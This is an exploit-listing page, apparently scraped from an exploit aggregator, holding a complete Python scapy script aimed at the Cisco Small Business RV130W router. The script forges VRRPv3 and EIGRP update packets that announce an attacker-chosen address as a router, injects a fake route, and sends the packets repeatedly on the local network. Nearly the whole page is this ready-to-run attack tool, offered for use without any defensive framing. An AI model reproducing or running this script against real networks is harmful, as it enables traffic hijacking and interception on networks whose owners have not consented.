Exploit for Cisco Small Business RV130W 1.0.3.44 Injection

Name: Exploit for Cisco Small Business RV130W 1.0.3.44 Injection
Rating: 5 (156 reviews)
2021-09-27 | CVSS 0.6
## https://sploitus.com/exploit?id=PACKETSTORM:164288
# Exploit Title: Cisco small business RV130W 1.0.3.44 - Inject Counterfeit Routers  
# Date: 24/09/2021  
# Exploit Author: Michael Alamoot  
# Vendor Homepage: https://www.cisco.com/  
# Version: RV130W 1.0.3.44  
# Tested on: Kali linux  
  
#! /usr/bin/env python3   
from scapy.contrib.eigrp import EIGRPAuthData  
from scapy.contrib.eigrp import EIGRPIntRoute  
from scapy.contrib.eigrp import EIGRPGeneric  
from scapy.contrib.eigrp import EIGRPSeq  
from scapy.contrib.eigrp import EIGRP   
from scapy.layers.vrrp import VRRPv3  
from scapy.layers.vrrp import VRRP  
from scapy.layers.l2 import Ether  
from scapy.layers.inet import IP   
from scapy.sendrecv import sendp  
from scapy.volatile import RandMAC  
from scapy.all import conf  
import socket,networkx,os  
import argparse,sys,asyncio  
  
class argX:   
def __init__(self):  
self.parser = argparse.ArgumentParser(description="...")  
self.parser.add_argument(  
"-i","--ip",  
help="ip router fake injection",  
dest="ip",  
)  
self.parser.add_argument(  
"-r","--ip-router",  
help="ip router root",  
dest="router",  
default=conf.route.route('0.0.0.0')[2]  
)  
  
def argvX(self):  
""" [0] ip-router [1] ip-fake """  
args = self.parser.parse_args()  
ip = args.ip  
route = args.router  
return [ip,route]  
  
  
class exploit(object):  
  
def __new__(cls,*args,**kwargs):  
return super(exploit,cls).__new__(cls)   
  
def __init__(self,IProuter,InjectFackeRouter):  
self.IProuter = IProuter  
self.InjectFackeRouter = InjectFackeRouter  
self.MAC = RandMAC()  
  
def pyload(self):  
pyload = Ether()/IP(src=self.IProuter,dst="224.0.0.18")\  
/VRRPv3(version=3,type=1,vrid=1,priority=100,res=0,adv=100,addrlist=self.InjectFackeRouter)\  
/IP(src=self.IProuter,dst="224.0.0.10") \  
/EIGRP(opcode="Update",asn=100,seq=0,ack=0   
,tlvlist=[EIGRPIntRoute(dst=self.InjectFackeRouter,nexthop=self.IProuter)])  
return pyload  
  
def start(self,count=[0,100]):  
for i in range(count[0],count[1]):  
sendp(self.pyload(),verbose=0,return_packets=False,inter=0,loop=0)  
print(f"\033[41m PACKET \033[0m Injection fake routers {self.IProuter} {self.InjectFackeRouter} \033[31m{i}\033[0m")  
  
if __name__ == "__main__":  
a = argX().argvX()  
if a[0]:  
net1 = exploit(IProuter=a[1],InjectFackeRouter=a[0])  
net1.start()  
else:  
print("[-h] [--help]")